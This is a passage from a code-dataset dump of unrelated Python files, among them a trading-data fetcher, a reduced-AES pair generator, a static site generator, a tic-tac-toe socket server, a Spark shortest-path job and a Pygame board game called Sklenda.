endDateTime='',\n durationStr=durationStr, \n barSizeSetting=barSizeSetting,\n whatToShow='ADJUSTED_LAST',\n useRTH=0,\n formatDate=1,\n keepUpToDate=0,\n chartOptions=[],)\n \ndef websocket_conn():\n app.run()\n \napp=TradingApp()\napp.connect(\"127.0.0.1\", 7497, clientId=1) \n\ncon_thread=threading.Thread(target=websocket_conn, daemon=True)\ncon_thread.start()\ntime.sleep(1)\n\ntickers=['SAIL',\t'SIEMENS','FORTIS', \t'NIFTYBEES']\ndf_dict={}\n\n\nfor ticker in tickers:\n contract=nse_contract(ticker)\n histData(tickers.index(ticker),contract)\n time.sleep(5)\n \n df_dict[ticker]=pd.DataFrame(app.data[tickers.index(ticker)])\n df_dict[ticker].set_index(\"Date\", inplace=True)\n \n\n \n ","sub_path":"IBKR/4_5_iterativr_data.py","file_name":"4_5_iterativr_data.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"579471500","text":"import sys\n\nfrom jinja2 import Template\n\ndef gen_mask(end):\n mask = 0\n for j in range(16):\n # current bit is 0 indicating passive nibble\n if end % 2 == 0:\n mask |= 15 << (4*j)\n end >>= 1\n return '{0:#x}'.format(mask)\n\ndef gen_logic(diff):\n lines = []\n for i in range(16):\n if diff % 2 == 1:\n lines.append(\"(a >> {0} & 0xF) != (b >> {0} & 0xF) &&\".format(4*i))\n\n diff >>= 1\n\n if len(lines) == 0:\n return \"return 1;\"\n\n lines[-1] = lines[-1][:-3]\n combined = \"\\n\".join([\" {}\".format(line) for line in lines])\n return \" return (\\n{}\\n );\".format(combined)\n\ndef gen_passive_logic(start):\n hex_str = \"{:04X}\".format(start)\n lines = []\n total_bits = 64 - 4 * bin(start).count(\"1\")\n num_bits = total_bits\n for i in range(4):\n line = \"pt[{}] = \".format(i)\n\n c = hex_str[i]\n if c == '0':\n line += \"i >> {} & 0xFFFF\".format(num_bits - 16)\n num_bits -= 16\n elif c == '1':\n line += \"(i >> {} & 0xFFF) << 4\".format(num_bits - 12)\n num_bits -= 12\n elif c == '2':\n line += \"((i >> {} & 0xFF) << 8) | (i >> {} & 0xF)\".format(num_bits - 8, num_bits - 12)\n num_bits -= 12\n elif c == '3':\n line += \"i >> {} & 0xFF << 8\".format(num_bits - 8)\n num_bits -= 8\n elif c == '4':\n line += \"((i >> {} & 0xF) << 12) | (i >> {} & 0xFF)\".format(num_bits - 4, num_bits - 12)\n num_bits -= 12\n elif c == '5':\n line += \"((i >> {} & 0xF) << 12) | ((i >> {} & 0xF) << 4)\".format(num_bits - 4, num_bits - 8)\n num_bits -= 8\n elif c == '6':\n line += \"((i >> {} & 0xF) << 12) | (i >> {} & 0xF)\".format(num_bits - 4, num_bits - 8)\n num_bits -= 8\n elif c == '7':\n line += \"(i >> {} & 0xF) << 12\".format(num_bits - 4)\n num_bits -= 4\n elif c == '8':\n line += \"i >> {} & 0xFFF\".format(num_bits - 12)\n num_bits -= 12\n elif c == '9':\n line += \"(i >> {} & 0xFF) << 4\".format(num_bits - 8)\n num_bits -= 8\n elif c == '10':\n line += \"((i >> {} & 0xF) << 8) | (i >> {} & 0xF)\".format(num_bits - 4, num_bits - 8)\n num_bits -= 8\n elif c == '11':\n line += \"(i >> {} & 0xF) << 8\".format(num_bits - 4)\n num_bits -= 4\n elif c == '12':\n line += \"i >> {} & 0xFF\".format(num_bits - 8)\n num_bits -= 8\n elif c == '13':\n line += \"(i >> {} & 0xF) << 4\".format(num_bits - 4)\n num_bits -= 4\n elif c == '14':\n line += \"i >> {} & 0xF\".format(num_bits - 4)\n num_bits -= 4\n elif c == '15':\n line += \"0\"\n\n line += \";\"\n lines.append(line)\n\n return \"\\n\".join([\" {}\".format(line) for line in lines])\n\ndef gen_start_active_logic(start):\n hex_str = \"{:4X}\".format(start).replace(\" \", \"0\")\n lines = []\n num_active = bin(start).count(\"1\")\n num_vars = num_active\n\n lines.append(\"uint16_t {};\".format(\n \", \".join(\n \"i{}\".format(i) for i in range(num_active)\n )\n ))\n for i in range(num_active):\n lines.append(\"for (i{0} = 0; i{0} < 16; ++i{0})\".format(i) + \" {\")\n\n for i in range(4):\n c = int(hex_str[i])\n\n if c == 0:\n continue\n\n tmp = c\n mask = 0\n for j in range(4):\n # current bit is 0 indicating passive nibble\n if tmp % 2 == 0:\n mask |= 15 << (4*j)\n tmp >>= 1\n line = 'pt[{}] &= {:#x};'.format(i, mask)\n lines.append(line)\n\n line = \"pt[{}] |= \".format(i)\n j = num_active - num_vars\n if c == 1:\n line += \"i{}\".format(j)\n num_vars -= 1\n elif c == 2:\n line += \"i{} << 4\".format(j)\n num_vars -= 1\n elif c == 3:\n line += \"(i{} << 4) | i{}\".format(j, j+1)\n num_vars -= 2\n elif c == 4:\n line += \"i{} << 8\".format(j)\n num_vars -= 1\n elif c == 5:\n line += \"(i{} << 8) | i{}\".format(j, j+1)\n num_vars -= 2\n elif c == 6:\n line += \"(i{} << 8) | (i{} << 4)\".format(j, j+1)\n num_vars -= 2\n elif c == 7:\n line += \"(i{} << 8) | (i{} << 4) | i{}\".format(j, j+1, j+2)\n num_vars -= 3\n elif c == 8:\n line += \"i{} << 12\".format(j)\n num_vars -= 1\n elif c == 9:\n line += \"(i{} << 12) | i{}\".format(j, j+1)\n num_vars -= 2\n elif c == 10:\n line += \"(i{} << 12) | (i{} << 4)\".format(j, j+1)\n num_vars -= 2\n elif c == 11:\n line += \"(i{} << 12) | (i{} << 4) | i{}\".format(j, j+1, j+2)\n num_vars -= 3\n elif c == 12:\n line += \"(i{} << 12) | (i{} << 8)\".format(j, j+1)\n num_vars -= 2\n elif c == 13:\n line += \"(i{} << 12) | (i{} << 8) | i{}\".format(j, j+1, j+2)\n num_vars -= 3\n elif c == 14:\n line += \"(i{} << 12) | (i{} << 8) | (i{} << 4)\".format(j, j+1, j+2)\n num_vars -= 3\n elif c == 15:\n line += \"(i{} << 12) | (i{} << 8) | (i{} << 4) | i{}\".format(j, j+1, j+2, j+3)\n num_vars -= 4\n line += \";\"\n lines.append(line)\n\n return \"\\n\".join([\" {}\".format(line) for line in lines])\n\ndef gen_id_active_logic(start):\n hex_str = \"{:4X}\".format(start)\n num_active = bin(start).count(\"1\")\n return(\" | \".join(\n \"i{} << {}\".format(i, 4 * (num_active - i - 1)) for i in range(num_active)\n )\n )\n\ndef gen_end_active_logic(start):\n hex_str = \"{:4X}\".format(start)\n num_active = bin(start).count(\"1\")\n lines = []\n for i in range(num_active):\n lines.append(\"}\")\n return \"\\n\".join([\" {}\".format(line) for line in lines])\n\ndef main():\n if len(sys.argv) < 3:\n print(\"usage: {} [start] [end0] [end1] [end2] ...\".format(sys.argv[0]))\n sys.exit(1)\n\n start = int(sys.argv[1])\n ends = [int(i) for i in sys.argv[2:]]\n\n masks = {}\n logics = {}\n logics[start] = gen_logic(start)\n for end in ends:\n masks[end] = gen_mask(end)\n logics[end] = gen_logic(end)\n\n passive_logic = gen_passive_logic(start)\n start_active_logic = gen_start_active_logic(start)\n id_active_logic = gen_id_active_logic(start)\n end_active_logic = gen_end_active_logic(start)\n\n with open('gen_pairs.c.jinja') as f:\n tmpl = Template(f.read())\n\n info = {\n \"start\": start,\n \"ends\": ends,\n \"num_active\": bin(start).count(\"1\"),\n \"masks\": masks,\n \"logics\": logics,\n \"passive_logic\": passive_logic,\n \"start_active_logic\": start_active_logic,\n \"id_active_logic\": id_active_logic,\n \"end_active_logic\": end_active_logic\n }\n print(tmpl.render(**info))\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"nibble_aes/gen_gen_pairs.py","file_name":"gen_gen_pairs.py","file_ext":"py","file_size_in_byte":7045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"163423710","text":"import json\nimport os\nimport markdown\n\nfrom jinja2 import Environment\nfrom jinja2 import FileSystemLoader\nfrom os.path import join\nfrom os.path import normpath\n\n\ndef ensure_folder_exists(path):\n if not os.path.exists(path):\n os.mkdir(path)\n\n\ndef get_articles_config_json(filepath):\n if not os.path.exists(filepath):\n return None\n with open(filepath, 'r', encoding=\"UTF-8\") as file_handler:\n return json.load(file_handler)\n\n\ndef get_site_templates():\n templates_folder = \"templates\"\n index_page_template_name = \"index_page_template.html\"\n article_page_template_name = \"article_page_template.html\"\n environment = Environment(loader=FileSystemLoader(templates_folder), autoescape=True)\n index_page_template = environment.get_template(index_page_template_name)\n article_page_template = environment.get_template(article_page_template_name)\n return index_page_template, article_page_template\n\n\ndef save_rendered_html(html_output_filepath, html):\n with open(html_output_filepath, \"w\", encoding=\"utf8\") as file_handler:\n file_handler.write(html)\n\n\ndef form_path_to_html_file(markdown_path):\n articles_folder = \"articles/\"\n return normpath(join(articles_folder, markdown_path.replace('.md', '.html')))\n\n\ndef create_index_page_from_html_template(index_page_template, config):\n rendered_index_page_filepath = \"site/index.html\"\n index_page_template.globals['form_article_path'] = form_path_to_html_file\n rendered_index_page = index_page_template.render(config)\n save_rendered_html(rendered_index_page_filepath, rendered_index_page)\n\n\ndef get_article_markdown(filepath):\n if not os.path.exists(filepath):\n return None\n with open(filepath, 'r', encoding=\"UTF-8\") as file_handler:\n return file_handler.read()\n\n\ndef render_article_markdown_to_html_template(template, article_markdown, article_info):\n link_to_index_page = \"../../index.html\"\n article_info_data = article_info\n article_html = markdown.markdown(article_markdown, extensions=['codehilite', 'fenced_code'])\n article_info_data.update({'html': article_html, 'link': link_to_index_page})\n return template.render(article_info_data)\n\n\ndef create_articles_from_html_template(article_page_template, config):\n articles_info_from_config = config[\"articles\"]\n markdown_articles_folder = \"./articles/\"\n html_articles_folder = \"./site/articles/\"\n ensure_folder_exists(html_articles_folder)\n for article_info in articles_info_from_config:\n article_source = article_info[\"source\"]\n article_source_html = article_source.replace(\"md\", \"html\")\n html_output_filepath = normpath(join(html_articles_folder, article_source_html))\n article_topic_folder = os.path.split(html_output_filepath)[0]\n ensure_folder_exists(article_topic_folder)\n article_markdown_filepath = normpath(join(markdown_articles_folder, article_source))\n article_markdown = get_article_markdown(article_markdown_filepath)\n article_html = render_article_markdown_to_html_template(article_page_template,\n article_markdown, article_info)\n save_rendered_html(html_output_filepath, article_html)\n\n\nif __name__ == \"__main__\":\n site_folder = \"site\"\n ensure_folder_exists(site_folder)\n articles_config_json_filepath = \"config.json\"\n config = get_articles_config_json(articles_config_json_filepath)\n index_page_template, article_page_template = get_site_templates()\n create_index_page_from_html_template(index_page_template, config)\n create_articles_from_html_template(article_page_template, config)\n print(\"Site was successfully generated in \\\"{}\\\" folder.\".format(site_folder))\n","sub_path":"site_generator.py","file_name":"site_generator.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"495205243","text":"#!/usr/bin/env python\r\ntry:\r\n from setuptools import setup\r\n from setuptools import Extension\r\nexcept ImportError:\r\n from distutils.core import setup\r\n from distutils.extension import Extension\r\n\r\n\r\ncmdclass = {}\r\next_modules = []\r\n\r\ntry:\r\n from Cython.Distutils import build_ext\r\n ext_modules += [\r\n Extension(\"abce.trade\", [\"abce/trade.pyx\"]),\r\n Extension(\"abce.multicurrencytrade\", [\"abce/multicurrencytrade.pyx\"]),\r\n Extension(\"abce.online_variance\", [\"abce/online_variance.pyx\"]),\r\n ]\r\n cmdclass.update({'build_ext': build_ext})\r\nexcept ImportError:\r\n ext_modules += [\r\n Extension(\"abce.trade\", [\"abce/trade.c\"]),\r\n Extension(\"abce.multicurrencytrade\", [\"abce/multicurrencytrade.c\"]),\r\n Extension(\"abce.online_variance\", [\"abce/online_variance.c\"]),\r\n ]\r\n\r\n\r\nsetup(name='abce',\r\n version='0.6.0a0',\r\n author='Davoud Taghawi-Nejad',\r\n author_email='Davoud@Taghawi-Nejad.de',\r\n description='Agent-Based Complete Economy modelling platform',\r\n url='https://github.com/DavoudTaghawiNejad/abce.git',\r\n package_dir={'abce': 'abce'},\r\n packages=['abce'],\r\n long_description=open('README.rst').read(),\r\n install_requires=['numpy >= 1.10.2p',\r\n 'pandas >= 0.17.1',\r\n 'networkx >= 1.9.1',\r\n 'flask >= 0.10.1',\r\n 'bokeh < 0.12.0',\r\n 'future'],\r\n include_package_data=True,\r\n ext_modules=ext_modules,\r\n use_2to3=True,\r\n cmdclass=cmdclass)\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"184207284","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = \"Q1mi\"\n# Email: master@liwenzhou.com\n\n\"\"\"\nPython Web编程实战(小绿书)里面学到的知识点\n\"\"\"\n\n\n# 1.使用next获取循环中符合条件的值\na1 = -1\nfor i in range(1, 10):\n if not i % 4:\n a1 = i\n break\nprint(a1)\n\na2 = next((i for i in range(1, 10) if not i % 4), -1)\nprint(a2)\n\n# 2.执行调用直到某种情况结束\n\"\"\"\nblocks = []\nwhile True:\n block = f.read(32)\n if block == \"\":\n break\n blocks.append(block)\n\n\"\"\"\n\n\n\"\"\"\nfrom functools import partial\nblocks = []\nfor block in iter(partial(f.read, 32), \"\"):\n blocks.append(block)\n\"\"\"\n\n\n","sub_path":"next_partial.py","file_name":"next_partial.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"411256685","text":"#!/usr/bin/python3\n#\n# Wesleyan University\n# COMP 332, Spring 2018\n# Homework 2: Distributed tic-tac-toe game\n# Nikhil Ghosh\n\nimport binascii\nimport random\nimport socket\nimport sys\nimport threading\n\nfrom tictactoe import *\n\nclass Server():\n \"\"\"\n Server for TicTacToe game\n \"\"\"\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.backlog = 1\n self.start()\n\n def conn_send(self, conn, string):\n bin_data = string.encode('utf-8')\n conn.sendall(bin_data)\n\n # for reading client move\n def conn_read(self, conn):\n bin_data = ''\n while True:\n bin_data += conn.recv(1024).decode('utf-8')\n try:\n bin_data.index(' end')\n break\n except ValueError:\n pass\n bin_data = bin_data.split(' ')\n u_row, u_col = int(bin_data[0]), int(bin_data[1])\n return u_row, u_col\n\n\n def start(self):\n # Init server socket to listen for connections\n try:\n server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_sock.bind((self.host, self.port))\n server_sock.listen(self.backlog)\n except OSError as e:\n print (\"Unable to open server socket: \", e)\n if server_sock:\n server_sock.close()\n sys.exit(1)\n # Wait for client connection\n while True:\n client_conn, client_addr = server_sock.accept()\n print ('Client with address has connected', client_addr)\n thread = threading.Thread(target = self.play, args = (client_conn, client_addr))\n thread.start()\n\n\n def play(self, conn, addr):\n # Fill out this function\n print('Play game here')\n # Create board on server end\n board_size_init = conn.recv(1024)\n board_size_temp = board_size_init.decode('utf-8')\n board_size = int(board_size_temp.split(' ')[0])\n t = TicTacToe(board_size)\n t.display(\"\")\n\n # gameplay\n print(\"Play game\")\n while not t.check_done():\n # Receive client move\n u_row, u_col = self.conn_read(conn)\n # display client move on server board\n t.move(u_row, u_col, \"X\")\n # Display user (client) move\n t.display(\"User Move\")\n # Check state\n if t.check_done(): break\n # create server move\n s_row, s_col = t.server_choose()\n # implement server move on server board\n t.move(s_row, s_col, \"O\")\n # Display server move on server board\n t.display(\"Server move\")\n # send server move to client, add flag\n self.conn_send(conn, str(s_row) + \" \" + str(s_col) + \" end\")\n # Check state\n if t.check_done(): break\n\n\ndef main():\n server_host = 'localhost'\n server_port = 50008\n\n if len(sys.argv) > 1:\n server_host = sys.argv[1]\n server_port = int(sys.argv[2])\n\n # Create ttt server object\n s = Server(server_host, server_port)\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print(\"Shutting down...\")\n except Exception:\n print(\"Other exception...\")\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"85308741","text":"from pyspark import SparkConf, SparkContext\nimport sys, os\nassert sys.version_info >= (3, 5)\nsc = SparkContext(conf=SparkConf().setAppName('shortest path'))\nassert sc.version >= '2.3'\n\ndef main(inputs, output, start, end):\n path = os.path.join(inputs, 'links-simple-sorted.txt')\n fields = sc.textFile(path).map(getEdges).cache()\n \n paths = sc.parallelize([(start, (None, 0))])\n for i in range(6):\n current = paths.filter(lambda x: x[1][1] == i)\n newPaths = fields.join(current).flatMap(getPaths)\n paths = paths.union(newPaths).reduceByKey(min).cache()\n\n if paths.lookup(end):\n break\n \n finalPath = [end]\n source = paths.lookup(end)[0][0]\n while source is not None:\n finalPath.insert(0, source)\n source = paths.lookup(source)[0][0]\n\n finalPath = sc.parallelize(finalPath, 1)\n finalPath.saveAsTextFile(output + '/path')\n\ndef getPaths(node):\n neighbours = node[1][0]\n distance = node[1][1][1]\n\n for neighbour in neighbours:\n yield (neighbour, (node[0], distance + 1))\n\ndef getEdges(node):\n fields = node.split()\n key = fields[0][:-1]\n\n nodes = []\n for i in range(1, len(fields)):\n nodes.append(fields[i])\n\n return (key, nodes)\n\nif __name__ == '__main__':\n inputs = sys.argv[1]\n output = sys.argv[2]\n start = sys.argv[3]\n end = sys.argv[4]\n main(inputs, output, start, end)","sub_path":"a6/p2/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"17510725","text":"import cv2\nimport requests\nimport json\nimport argparse\n\napi_url_base = 'http://127.0.0.1:5000/api'\n\n\nimg_path = './images/testing-images/pepsi+products000029.jpg'\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", default=img_path, help=\"Path to the image\")\nap.add_argument(\"-s\", \"--scale\", type=float, default=1.5, help=\"scale factor size\")\nargs = vars(ap.parse_args())\n\nimg_path = args['image']\n\nimg = cv2.imread(img_path)\nif img is None:\n exit('Image path is not valid. Please check!')\n\ndef detect_logo(files):\n api_url = '{0}/detect_logo'.format(api_url_base)\n\n response = requests.post(api_url, data=files)\n\n return response\n\n\ndef main():\n print('Requesting server...')\n img_parsed = cv2.imencode(img_path[-4:], img)[1].tostring()\n # img_encoded = base64.b64encode(img_parsed)\n\n # files = {'image': img_encoded}\n query_response = detect_logo(img_parsed)\n res = json.loads(query_response.content.decode('utf-8'))\n\n with open('detectedBoxesAPI.csv', 'a') as f:\n print('\\nDeteced Boxes Coordinates: ')\n num_boxes = 0\n f.write(\"\\nFor image at: {0}\\n\".format(img_path))\n for entry in res['detectedBoxes']:\n num_boxes += 1\n # Write on file\n for i in entry:\n f.write(str(i)); f.write(\" \")\n f.write('\\n')\n print(entry)\n f.write(\"Number of Boxes: {0:d}\\n\".format(num_boxes))\n print('\\nNumber of Boxes detected: {0}\\n'.format(num_boxes))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"apiExample.py","file_name":"apiExample.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"460556840","text":"# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/topics/items.html\n\nfrom scrapy.item import Item, Field\n\nclass App(Item):\n\tname = Field()\n\tcategory = Field()\n\tdescription = Field()\n\tprice = Field()\n\tseller = Field()\n\tsellerWebSites = Field()\n\tcurVersion = Field()\n\tcurRating = Field()\n\tcurVersionRatingCount = Field()\n\tallVersionRatingCount = Field()\n\tappStoreLink = Field()\t#full url to app store entry\n","sub_path":"appscrape/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"538232038","text":"#! python3\n\nimport os, os.path as path, re, sys\n\n# Make it always run in root\nos.chdir(path.abspath(path.dirname(__file__)))\n\ndef read(file):\n\twith open(file, \"r\", encoding='utf-8') as f:\n\t\tcontent = f.read()\n\treturn content\n\ndef write(file, content):\n\twith open(file, \"w\", encoding=\"utf-8\") as f:\n\t\tf.write(content)\n\nclass Tasker:\n\tdef __init__(self, task_cls):\n\t\ttasks = task_cls()\n\t\targv = sys.argv[1:]\n\n\t\tif not argv:\n\t\t\targv = [\"default\"]\n\n\t\tfor command in argv:\n\t\t\tcommand, sep, param = command.partition(\":\")\n\n\t\t\tif sep:\n\t\t\t\tgetattr(tasks, command)(param)\n\t\t\telse:\n\t\t\t\tgetattr(tasks, command)()\n\nclass Tasks:\n\tdef default(self):\n\t\tself.build()\n\t\tself.dist()\n\t\tself.upload()\n\t\tself.git()\n\t\tself.install()\n\n\tdef dist(self):\n\t\timport subprocess, sys\n\t\tsubprocess.call([sys.executable, \"setup.py\", \"sdist\", \"bdist_wheel\"])\n\n\tdef upload(self):\n\t\timport subprocess, comiccrawler\n\t\tsubprocess.call([\"twine\", \"upload\", \"dist/*\" + comiccrawler.__version__ + \"*\"])\n\n\tdef git(self):\n\t\timport subprocess, comiccrawler\n\n\t\tversion = comiccrawler.__version__\n\n\t\tsubprocess.call([\"git\", \"add\", \"-A\", \".\"])\n\t\tsubprocess.call([\"git\", \"commit\", \"-m\", \"Release v\" + version])\n\t\tsubprocess.call([\"git\", \"tag\", \"-a\", \"v\" + version, \"-m\", \"Release v\" + version])\n\t\tsubprocess.call([\"git\", \"push\", \"--follow-tags\"])\n\n\tdef build(self):\n\t\timport re, comiccrawler, comiccrawler.mods\n\n\t\t# Build readme\n\t\treadme = read(\"README-src.rst\")\n\n\t\tversion = comiccrawler.__version__\n\t\tdomains = \" \".join(comiccrawler.mods.list_domain())\n\n\t\treadme = readme.replace(\"@@VERSION\", version)\n\t\treadme = readme.replace(\"@@DOMAINS\", domains)\n\n\t\twrite(\"README.rst\", readme)\n\n\t\t# Build setup.py\n\t\tsetup = read(\"setup-src.py\")\n\n\t\tsetup = setup.replace(\"@@VERSION\", repr(version))\n\n\t\twrite(\"setup.py\", setup)\n\n\tdef install(self):\n\t\timport subprocess\n\t\tsubprocess.call([\"pip\", \"install\", \"-e\", \".\"])\n\nif __name__ == \"__main__\":\n\tTasker(Tasks)\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"571588297","text":"# Sklenda\r\n# Originally by Petr Janik\r\n# Idea by Zdenek Sklenar\r\n\r\nimport pygame\r\nimport sys\r\nfrom pygame.locals import *\r\n\r\nBOARD_WIDTH = 4 \r\nBOARD_HEIGHT = 4 \r\nTILE_SIZE = 80\r\nWINDOW_WIDTH = 800\r\nWINDOW_HEIGHT = 500\r\nFPS = 30\r\nBLANK = None\r\n\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nYELLOW = (252, 201, 106)\r\nBROWN = (96, 46, 8)\r\nRED = (255, 0, 0)\r\n\r\nBG_COLOR = BLACK\r\nTILE_COLOR = WHITE\r\nTEXT_COLOR = WHITE\r\nBORDER_COLOR = BLACK\r\nPOINT_COLOR = RED\r\nBASIC_FONT_SIZE = 20\r\n\r\nCIRCLE = 'circle'\r\nSQUARE = 'square'\r\nSMALL = 'small'\r\nBIG = 'big'\r\nFALSE= False\r\nTRUE = True\r\n\r\nFPS_CLOCK = None\r\nDISPLAY_SURFACE = None\r\nBASIC_FONT = None\r\nBUTTONS = None\r\n\r\n\r\n\r\ndef main():\r\n global FPS_CLOCK, DISPLAY_SURFACE, BASIC_FONT, BUTTONS\r\n\r\n pygame.init()\r\n FPS_CLOCK = pygame.time.Clock()\r\n DISPLAY_SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\r\n pygame.display.set_caption('Sklenda')\r\n BASIC_FONT = pygame.font.Font('freesansbold.ttf', BASIC_FONT_SIZE)\r\n\r\n while True:\r\n run_game()\r\n\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit()\r\n \r\ndef run_game():\r\n icons = [\r\n [\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n ],\r\n [\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n ],\r\n [\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n ],\r\n [\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n ]\r\n ]\r\n icons2 = [\r\n [\r\n [CIRCLE, YELLOW, FALSE, SMALL],\r\n [CIRCLE, YELLOW, FALSE, BIG],\r\n [CIRCLE, YELLOW, TRUE, SMALL],\r\n [CIRCLE, YELLOW, TRUE, BIG],\r\n ],\r\n [\r\n [CIRCLE, BROWN, FALSE, SMALL],\r\n [CIRCLE, BROWN, FALSE, BIG],\r\n [CIRCLE, BROWN, TRUE, SMALL],\r\n [CIRCLE, BROWN, TRUE, BIG],\r\n ],\r\n [\r\n [SQUARE, YELLOW, FALSE, SMALL],\r\n [SQUARE, YELLOW, FALSE, BIG],\r\n [SQUARE, YELLOW, TRUE, SMALL],\r\n [SQUARE, YELLOW, TRUE, BIG],\r\n ],\r\n [\r\n [SQUARE, BROWN, FALSE, SMALL],\r\n [SQUARE, BROWN, FALSE, BIG],\r\n [SQUARE, BROWN, TRUE, SMALL],\r\n [SQUARE, BROWN, TRUE, BIG],\r\n ]\r\n ] \r\n WIN = False\r\n choosed = False\r\n placed = 0\r\n shape, color, point, size = None, None, None, None\r\n game_state = 1\r\n new_surf, new_rect = make_text('New Game', BLACK, TILE_COLOR, WINDOW_WIDTH - 145, WINDOW_HEIGHT - 50)\r\n while True: \r\n if game_state == 1:\r\n message = \"Player 1 chooses block.\"\r\n elif game_state == 2:\r\n message = \"Player 2 places block.\"\r\n player = \"2\"\r\n elif game_state == 3:\r\n message = \"Player 2 chooses block.\"\r\n elif game_state == 4:\r\n message = \"Player 1 places block.\"\r\n player = \"1\"\r\n\r\n if placed == 16:\r\n message = \"It is a tie! Press New Game to play again.\"\r\n \r\n if WIN:\r\n message = \"Player \" + player + \" wins!\"\r\n for event in pygame.event.get():\r\n if event.type == QUIT or (event.type == KEYUP and event.key == K_ESCAPE):\r\n terminate()\r\n elif event.type == pygame.MOUSEBUTTONUP:\r\n if new_rect.collidepoint(event.pos):\r\n return\r\n \r\n for event in pygame.event.get():\r\n if event.type == QUIT or (event.type == KEYUP and event.key == K_ESCAPE):\r\n terminate()\r\n elif event.type == pygame.MOUSEBUTTONUP:\r\n \r\n if game_state == 1 or game_state == 3:\r\n if get_tile_clicked2(event.pos[0], event.pos[1]) != (None, None):\r\n tile_x, tile_y = get_tile_clicked2(event.pos[0], event.pos[1])\r\n if icons2[tile_x][tile_y][0] != None:\r\n shape, color, point, size = icons2[tile_x][tile_y][0], icons2[tile_x][tile_y][1], icons2[tile_x][tile_y][2], icons2[tile_x][tile_y][3]\r\n icons2[tile_x][tile_y] = [None, None, None, None]\r\n choosed = True\r\n if game_state == 1:\r\n game_state = 2\r\n elif game_state == 3:\r\n game_state = 4\r\n \r\n elif game_state == 2 or game_state == 4:\r\n if get_tile_clicked(event.pos[0], event.pos[1]) != (None, None):\r\n tile_x, tile_y = get_tile_clicked(event.pos[0], event.pos[1])\r\n if icons[tile_x][tile_y][0] == None:\r\n choosed = False\r\n icons[tile_x][tile_y] = [shape, color, point, size]\r\n placed += 1\r\n WIN = check_for_quit(icons, tile_x, tile_y)\r\n if game_state == 2:\r\n game_state = 3\r\n elif game_state == 4:\r\n game_state = 1\r\n \r\n if new_rect.collidepoint(event.pos):\r\n return\r\n \r\n draw_board(icons, icons2, shape, color, point, size, choosed, new_surf, new_rect, message)\r\n\r\n pygame.display.update()\r\n FPS_CLOCK.tick(FPS)\r\n\r\ndef get_left_top_of_tile(tile_x, tile_y):\r\n left = (tile_x * TILE_SIZE) + 40\r\n top = (tile_y * TILE_SIZE) + 110\r\n return (left, top)\r\n\r\ndef get_left_top_of_tile2(tile_x, tile_y):\r\n left = (tile_x * TILE_SIZE) + 440\r\n top = (tile_y * TILE_SIZE) + 110\r\n return (left, top)\r\n\r\ndef draw_tile(tile_x, tile_y):\r\n left, top = get_left_top_of_tile(tile_x, tile_y)\r\n pygame.draw.rect(DISPLAY_SURFACE, TILE_COLOR, (left, top, TILE_SIZE, TILE_SIZE))\r\n pygame.draw.rect(DISPLAY_SURFACE, BORDER_COLOR, (left-1, top-1, TILE_SIZE+2, TILE_SIZE+2), 1)\r\n\r\ndef draw_tile2(tile_x, tile_y):\r\n left, top = get_left_top_of_tile2(tile_x, tile_y)\r\n pygame.draw.rect(DISPLAY_SURFACE, TILE_COLOR, (left, top, TILE_SIZE, TILE_SIZE))\r\n pygame.draw.rect(DISPLAY_SURFACE, BORDER_COLOR, (left-1, top-1, TILE_SIZE+2, TILE_SIZE+2), 1)\r\n\r\ndef make_text(text, color, bg_color, top, left):\r\n text_surf = BASIC_FONT.render(text, True, color, bg_color)\r\n text_rect = text_surf.get_rect()\r\n text_rect.topleft = (top, left)\r\n return (text_surf, text_rect)\r\n\r\ndef draw_board(icons, icons2, shape, color, point, size, choosed, new_surf, new_rect, message=\"\"):\r\n DISPLAY_SURFACE.fill(BG_COLOR)\r\n text_surf, text_rect = make_text(message, TEXT_COLOR, BG_COLOR, 40, 40)\r\n DISPLAY_SURFACE.blit(text_surf, text_rect)\r\n\r\n if choosed: \r\n display_choosed(icons2, shape, color, point, size)\r\n \r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in 